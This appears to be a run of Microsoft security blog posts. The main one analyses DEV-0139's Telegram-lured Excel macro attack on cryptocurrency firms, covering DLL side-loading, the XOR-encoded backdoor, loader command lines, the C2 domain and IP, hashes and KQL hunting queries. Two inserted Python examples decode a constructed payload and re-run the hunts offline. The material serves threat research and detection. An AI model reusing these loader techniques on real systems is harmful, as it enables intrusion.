In this third version of the threat matrix, we introduce a collection of mitigations specific to Kubernetes environments and associate each with relevant threat techniques. Those mitigations, as displayed below in Figure 1, provide practical tools to prevent the various attack techniques, using built-in Kubernetes and cloud tools.
Figure 1. A technique page with a mitigation section
When reviewing the different threat techniques in the matrix, a list of relevant mitigations is provided so that organizations can see if they are taking all the necessary steps to prevent a threat. Additionally, when looking at a specific mitigation, a list of relevant threat techniques is displayed and can help organizations prioritize their mitigation implementation plan according to their threat assessment and detection coverage in each area.
Mapping to MITRE ATT&CK techniques
Last year, MITRE added a container matrix to the MITRE ATT&CK framework. MITRE ATT&CK for containers matrix, inspired by Microsoft threat matrix for Kubernetes, is a result of a joint effort between MITRE, Microsoft, and additional companies in the industry. The differences between Microsoft’s and MITRE’s matrices are described in this blog. In the new version of the Microsoft threat matrix for Kubernetes, we include a mapping between the Microsoft matrix and MITRE ATT&CK techniques and mitigations, as displayed below in Figure 2. This can help organizations to efficiently use the two frameworks.
Figure 2. Mapping to MITRE ATT&CK techniques
The MITRE ATT&CK matrix for containers does not have an equivalent technique for each of the techniques in the Microsoft threat matrix for Kubernetes. When there is no equivalent technique in the MITRE containers matrix, the Microsoft technique may be mapped to a MITRE technique that is not part of the containers matrix but shares the same principle. For example, the Backdoor Container (MS-TA9012) technique explains that attackers can use Kubernetes controllers (such as DaemonSets) to run their code and survive reboots of the pods or nodes. This is very similar to MITRE’s Create or Modify System Process technique (T1543), which is about using services or daemons for the exact same purpose. Another example is the mapping between Malicious Admission Controller (MS-TA9015) and MITRE’s Event Triggered Execution. Although MITRE does not discuss containerized environments there, those two techniques share the same idea. When there is no MITRE technique with the same principle, the Microsoft technique does not point back to a MITRE technique.
New techniques
The new version of the matrix also introduces two new techniques and additional re-categorization of existing techniques:
New technique: Static pods
A persistence technique which allows attackers to deploy pods that aren’t managed by the Kubernetes API server.
New technique: Collecting data from pod
Kubernetes-native technique which allows attackers to extract data from running pods.
Extending existing technique: Container service account
Attackers may create new service accounts or steal tokens of existing service accounts for future use from inside and outside the cluster. Therefore, we also added this technique to the persistence tactic.
Attackers may use management interfaces for discovery purposes, after gaining initial access to the cluster. By using the network reachability between pods, attackers can connect to management interfaces from the internal network, allowing them to get valuable information about the workload. Thus, we also added this technique to the discovery tactic.
Figure 3. New techniques and re-categorization of existing techniques
New web interface
As new threats were added to the Kubernetes matrix and additional content was introduced, it became increasingly harder to effectively deliver the breadth of information included in the matrix as a blog post. Looking for ways to make it easier to use the Kubernetes threats and mitigations matrix as reference material for day-to-day security operations, we are releasing the matrix as a web site, shown in Figure 4 below.
Figure 4. The new interface of the threat matrix for Kubernetes
The threat matrix for Kubernetes can help organizations to have visibility to the unique attack surface of Kubernetes and help them to measure their coverage to those threats. With the new mitigation section, organizations can now understand the measures required to prevent those threats.
Microsoft Defender for Cloud can help detect and mitigate threats in your Kubernetes environments. Learn more about Microsoft Defender for Cloud support for container security.
We are pleased to announce the security review for Microsoft Edge, version 108!
We have reviewed the new settings in Microsoft Edge version 108 and determined that there are no additional security settings that require enforcement; however, there is one setting that deserves attention. The Microsoft Edge version 107 security baseline continues to be our recommended configuration, which can be downloaded from the Microsoft Security Compliance Toolkit.
TLS Encrypted ClientHello Enabled (Consider)
An interesting setting admins may wish to consider, particularly if using Windows Defender Network Protection or similar security software. TLS Encrypted ClientHello (ECH) Enabled is a privacy-improving feature that addresses one of the shortcomings of HTTPS: TLS does not hide from a network observer the target hostname to which the browser is connecting. This means that your company or ISP network administrator (or anyone who can observe network traffic) can see the hostname of the site to which your browser is connecting, which has privacy implications. ECH hides the hostname so that a network observer can only see the target IP address of browser traffic, but not which specific site at that IP is being requested.
The reason that this feature has a security impact is that some security software may be spying upon your network requests and blocking requests to specific sites based on the site’s hostname. As a specific example, the Windows Defender Network Protection feature relies upon looking at the Server Name Indication (SNI) within the ClientHello to decide whether to block traffic to sites on the “known malicious” list or the customer’s custom blocklist. If the ClientHello is encrypted by the browser’s new ECH, this Network Protection feature (and similar features in other security software) will not be able to read the SNI, and thus will not be able to block the traffic.
For Microsoft Edge specifically, there’s a subtlety around the interaction of ECH and Network Protection. Machine installed channels of Edge (Stable/Beta) are exempted from Network Protection (in favor of Microsoft Defender SmartScreen), so the implications of this policy on Microsoft Edge are really limited to Edge Canary OR users of non-Microsoft Defender security products. But IT departments using Network Protection in Google Chrome really should set the equivalent policy.
Microsoft Edge version 108 introduced 4 new computer settings and 4 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.
As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.
Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.
We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
Figure 1. Overview of the attack
Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.
In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.
As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.
Initial compromise
To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.
Figure 2. Legitimate profiles of cryptocurrency exchange employees (left) and fake profiles created by the threat actor (right)
It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.
After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.
Weaponized Excel file analysis
The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:
File name: OKX Binance & Huobi VIP fee comparision.xls
CompObjUserTypeLen: 31
CompObjUserType: Microsoft Excel 2003 Worksheet
ModifyDate: 2022:10:14 02:34:33
TitleOfParts: Comparison_Oct 2022
SharedDoc: No
Author: Wolf
CodePage: Windows Latin 1 (Western European)
AppVersion: 16
LinksUpToDate: No
ScaleCrop: No
LastModifiedBy: Wolf
HeadingPairs: Worksheets, 1
FileType: XLS
FileTypeExtension: xls
HyperlinksChanged: No
Security: None
CreateDate: 2022:10:14 02:34:31
Software: Microsoft Excel
MIMEType: application/vnd.ms-excel
Figure 3. The information in the malicious Excel file
The macro is obfuscated and abuses a UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is IFUZYDTTOP, and the macro retrieves the information with the code IFUZYDTTOP.MgQnQVGb.Caption, where MgQnQVGb is the name of a label in the UserForm and .Caption returns the text stored in that label.
The table below shows the data retrieved from the UserForm:
The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.
Figure 4. The deobfuscated code to load the extracted worksheet in invisible mode.
Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.
Extracted worksheet
The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:
File Name: VSDB688.tmp
CompObjUserType: Microsoft Excel 2003 Worksheet
ModifyDate: 2022:08:29 08:07:24
TitleOfParts: Sheet1
SharedDoc: No
CodePage: Windows Latin 1 (Western European)
AppVersion: 16
LinksUpToDate: No
ScaleCrop: No
CompObjUserTypeLen: 31
HeadingPairs: Worksheets, 1
FileType: XLS
FileTypeExtension: xls
HyperlinksChanged: No
Security: None
CreateDate: 2006:09:16 00:00:00
Software: Microsoft Excel
MIMEType: application/vnd.ms-excel
Figure 5. The second file is completely empty but contains the same UserForm abuse technique as the first stage.
The table below shows the deobfuscated data retrieved from the UserForm:
The macro retrieves some parameters from the UserForm then downloads a PNG file from hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Background.png. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.
Figure 6. Deobfuscated code that shows the download of the file Background.png
The PNG is then split into three parts and written in three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.
Figure 7. The three files are written into C:\ProgramData\SoftwareCache\ and run using the CreateProcess API
Loader analysis
Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.
Logagent.exe
Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.
The file contains the following metadata, but it is not signed:
logagent.exe imports functions from wsock32.dll, which the threat actor abuses to load malicious code onto the targeted system. To trigger the malicious wsock32.dll, logagent.exe is run with the following arguments, previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are then read by wsock32.dll: the GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename of the XOR-encoded backdoor that the malicious wsock32.dll loads, and /shadow is used as the XOR key to decrypt it. Both parameters are needed for the malware to function, which hinders analysis of any one file in isolation.
Figure 8. Command line execution from the running process logagent.exe
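The split between key and ciphertext described above can be reproduced to check a recovered file without running the loader. The following Python script is an added example written for this article, not the threat actor's code or Microsoft's: it applies the command-line key to a blob and only accepts the result if it carries a PE signature, mirroring the fact that the loader needs both the GUID file and the /shadow argument. The page states only that /shadow is the XOR key, so the repeating-key XOR used here is an assumption about the scheme; the "implant" is a constructed 88-byte stand-in with a valid DOS and PE header, not a real executable.

```python
"""Decode an XOR-encoded payload with the command-line key and confirm it is a PE before trusting it."""
import struct
from typing import Optional


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encodes and decodes (assumed scheme)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Minimal PE sanity check: 'MZ' at offset 0 and 'PE\\0\\0' at the offset stored in e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_payload(blob: bytes, key: bytes = b"/shadow") -> Optional[bytes]:
    """Return the decoded image if the key yields a PE, otherwise None (wrong key, wrong file)."""
    decoded = xor_with_key(blob, key)
    return decoded if looks_like_pe(decoded) else None


def _fake_pe() -> bytes:
    """Constructed stand-in for the implant: 64-byte DOS header whose e_lfanew points at 'PE\\0\\0'."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)  # PE signature immediately after the DOS header
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20


FAKE_IMPLANT = _fake_pe()
# What would sit on disk under the GUID filename: no MZ, no PE, nothing for a signature scan to find.
ENCODED_BLOB = xor_with_key(FAKE_IMPLANT, b"/shadow")


if __name__ == "__main__":
    print("on-disk starts with:", ENCODED_BLOB[:2])
    print("decoded with /shadow:", decode_payload(ENCODED_BLOB) is not None)
    print("decoded with wrong key:", decode_payload(ENCODED_BLOB, b"/wrong") is not None)
```

The PE check is the important part for triage: XOR with any key produces output, so a decoder that does not validate the result will happily hand back garbage, and the MZ/PE pair is cheap evidence that the key from the command line was the right one.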
Wsock32.dll
The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.
The forwarding of calls to the legitimate functions is visible in the import address table:
Figure 9. Import Address Table from wsock32.dll
Figure 10. Retrieving data with PeStudio revealed the original file name for the malicious wsock32.dll.
When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.
Figure 11. Verification of the presence of the file 56762eb9-411c-4842-9530-9922c46ba2da for decryption
The malicious wsock32.dll loads and decodes the file with the GUID name into memory; this final implant is used to remotely access the infected machine.
Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.
Related attack
We identified another file using a similar mechanism as logagent.exe and delivering the same payload. The loader is packaged as an MSI package and posed as an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called tplink.exe to sideload the malicious DLL called DUser.dll, which also uses DLL proxying.
creation datetime: 11/12/2009 11:47
author: 168 Trading
title: Installation Database
page count: 200
word count: 2
keywords: Installer, MSI, Database
last saved: 11/12/2009 11:47
revision number: {30CD8B94-5D3C-4B55-A5A3-3FC9C7CCE6D5}
last printed: 11/12/2009 11:47
application name: Advanced Installer 14.5.2 build 83143
subject: CryptoDashboardV2
template: x64;1033
code page: Latin I
comments: This installer database contains the logic and data required to install CryptoDashboardV2.
Figure 12. Installation details of the MSI file
Once the package is installed, it runs and side-loads the DLL using the following command: "C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe" 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, where it noticeably uses a different GUID.
Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:
Once the DLL is running, it loads and decodes the implant in memory and starts beaconing to the same domain. In this variant, the implant file uses the GUID name 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key /sven.
Implant analysis
The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:
First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.
Figure 13. Details about the connection to the C2.
Figure 14. The sample is connecting back to the domain name strainservice[.]com.
Infrastructure
It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account was set up quickly and used only once, indicating that it was created for a single target.
We identified one domain used as the C2 server, strainservice[.]com, which both implants connected back to. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had ports 80, 443, and 2083 open. The implants communicated on port 443.
Defending against targeted attacks
In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new but manage hundreds of millions of dollars, attracting the interest of threat actors.
In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified used a fake crypto dashboard application as a lure.
The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:
Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
Query that looks for Office apps that create a file within an uncommon directory (fewer than five occurrences) and builds a set of each device this is seen on and each user that has executed it, to help gauge how many users/hosts are compromised:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5
Query that summarizes child process of Office apps, looking for less than five occurrences:
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5
Query that lists all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths with fewer than five occurrences:
DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5
Query that searches for connections to malicious domains and IP addresses:
DeviceNetworkEvents
| where (RemoteUrl has_any ("strainservice.com"))
or (RemoteIP has_any ("198.54.115.248"))
Query that searches for files downloaded from malicious domains and IP addresses.
DeviceFileEvents
| where (FileOriginUrl has_any ("strainservice.com"))
or (FileOriginIP has_any ("198.54.115.248"))
Query that searches for Office apps downloading files from uncommon domains, grouping users, filenames, and devices together:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName),
FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName
Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName
Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex
@"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]+$"
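Two of the hunts above (Office child processes with the GUID-plus-switch command line, and files created by Office apps in uncommon locations), reimplemented in plain Python so the logic can be exercised offline against exported events. This is an added example, not code from the Microsoft report or from Microsoft 365 Defender: the record layout, field names, device and account names, and every sample event are constructed for this example, while the GUIDs, switches, drop directory and logagent.exe hash mirror values given in the report. The regex is adapted from the query above in two ways: the trailing switch may be longer than one character (the report's samples use /shadow and /sven) and an optional closing quote after .exe tolerates a quoted executable path like the one in the MSI variant.

```python
"""Offline re-implementation of two hunting queries from the report (added example)."""
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass

# Same Office process names the report's queries key on.  Matched as substrings,
# which is a simplification of KQL has_any (that matches whole terms).
OFFICE_APPS = ("word", "excel", "access", "powerpnt", "outlook")

# "<name>.exe <GUID> /<switch>" at the end of the command line; the optional
# quote after .exe and the "+" on the switch are the two adaptations noted above.
GUID_CMDLINE = re.compile(
    r'[A-Za-z0-9]+\.exe"? '
    r"[A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12}"
    r" /[A-Za-z0-9]+$"
)


@dataclass(frozen=True)
class ProcessEvent:          # assumed subset of a DeviceProcessEvents row
    device: str
    account: str
    parent: str              # InitiatingProcessFileName
    file_name: str
    company: str             # ProcessVersionInfoCompanyName
    cmdline: str             # ProcessCommandLine


@dataclass(frozen=True)
class FileEvent:             # assumed subset of a DeviceFileEvents row
    device: str
    account: str
    parent: str
    action: str              # ActionType
    path: str                # full path of the affected file
    sha256: str


def _is_office(parent: str) -> bool:
    return any(app in parent.lower() for app in OFFICE_APPS)


def guid_sideload_launches(events):
    """Office child processes whose command line has the loader's GUID-plus-switch
    shape, limited to Microsoft binaries as in the report's query (the abused host
    process, logagent.exe, is a Microsoft file)."""
    return [e for e in events
            if _is_office(e.parent)
            and "microsoft" in e.company.lower()
            and GUID_CMDLINE.search(e.cmdline)]


def uncommon_office_drops(events, threshold=5):
    """Files created by Office apps, grouped like the report's first query by
    (FileName, directory, parent, SHA256).  Groups seen fewer than `threshold`
    times are returned with the devices and accounts they were seen on."""
    groups = defaultdict(lambda: {"count": 0, "devices": set(), "accounts": set()})
    for e in events:
        if e.action != "FileCreated" or not _is_office(e.parent):
            continue
        # ntpath parses Windows paths correctly whatever the analysis host runs.
        key = (ntpath.basename(e.path), ntpath.dirname(e.path), e.parent, e.sha256)
        g = groups[key]
        g["count"] += 1
        g["devices"].add(e.device)
        g["accounts"].add(e.account)
    return {k: v for k, v in groups.items() if v["count"] < threshold}


def sample_events():
    """Constructed events: one infected host plus benign background noise."""
    drop = r"C:\ProgramData\SoftwareCache"
    guid_cmd = "56762eb9-411c-4842-9530-9922c46ba2da /shadow"
    procs = [
        ProcessEvent("WKS-01", "alice", "EXCEL.EXE", "logagent.exe", "Microsoft Corporation",
                     rf"{drop}\logagent.exe {guid_cmd}"),
        ProcessEvent("WKS-07", "bob", "WINWORD.EXE", "logagent.exe", "Microsoft Corporation",
                     rf'"{drop}\logagent.exe" {guid_cmd}'),          # quoted path form
        ProcessEvent("WKS-02", "carol", "EXCEL.EXE", "splwow64.exe", "Microsoft Corporation",
                     "splwow64.exe 12288"),                           # benign print helper
        ProcessEvent("WKS-03", "dave", "explorer.exe", "logagent.exe", "Microsoft Corporation",
                     rf"{drop}\logagent.exe {guid_cmd}"),             # not an Office child
    ]
    # A file every workstation's Excel creates: common, so it should be filtered out.
    files = [FileEvent(f"WKS-{i:02d}", "svc", "EXCEL.EXE", "FileCreated",
                       r"C:\ProgramData\Microsoft\Office\cache.dat", "CONSTRUCTED-SHA256-CACHE")
             for i in range(10, 15)]
    files += [
        FileEvent("WKS-01", "alice", "EXCEL.EXE", "FileCreated", rf"{drop}\logagent.exe",
                  "8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942"),
        FileEvent("WKS-01", "alice", "EXCEL.EXE", "FileCreated", rf"{drop}\wsock32.dll",
                  "CONSTRUCTED-SHA256-DLL"),
        FileEvent("WKS-01", "alice", "chrome.exe", "FileCreated",
                  r"C:\Users\alice\Downloads\setup.exe", "CONSTRUCTED-SHA256-DL"),
        FileEvent("WKS-01", "alice", "EXCEL.EXE", "FileModified", rf"{drop}\logagent.exe",
                  "CONSTRUCTED-SHA256-MOD"),
    ]
    return procs, files


if __name__ == "__main__":
    procs, files = sample_events()
    for e in guid_sideload_launches(procs):
        print(f"GUID side-load launch on {e.device} ({e.account}): {e.cmdline}")
    for (name, directory, parent, _), g in uncommon_office_drops(files).items():
        print(f"rare Office drop {directory}\\{name} from {parent}: {sorted(g['devices'])}")
```

The substring match on the parent name and the fixed threshold of five are the same trade-offs the KQL makes; tune the threshold to fleet size, since a drop directory seen on four hosts in a ten-host network is not rare.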
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy
To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:
We are excited to announce that applications to attend BlueHat 2023 are now open! BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023. Hosted by the Microsoft Security Response Center (MSRC), BlueHat is where …